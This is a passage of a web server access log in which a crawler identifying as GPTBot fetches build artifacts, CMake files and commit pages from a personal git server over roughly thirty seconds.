192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11514] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16398] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73569] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:15:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39740] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14330] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:15:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:15:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9964] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:15:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14302] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:15:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11063] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:15:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10021] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14637] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10940] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" -[17/Feb/2026:15:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 2814885] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:15:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:15:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 77831] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:15:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 53113] [Gzip 27.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:15:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:15:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20381] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24007] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9930] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:15:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 9883] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" -[17/Feb/2026:15:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt-requests_error.log" [Client 74.7.227.38] [Length 21186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:15:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.patch" [Client 74.7.227.38] [Length 396491] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" -[17/Feb/2026:15:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents" [Client 74.7.227.38] [Length 60519] [Gzip 8.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" -[17/Feb/2026:15:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11212] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 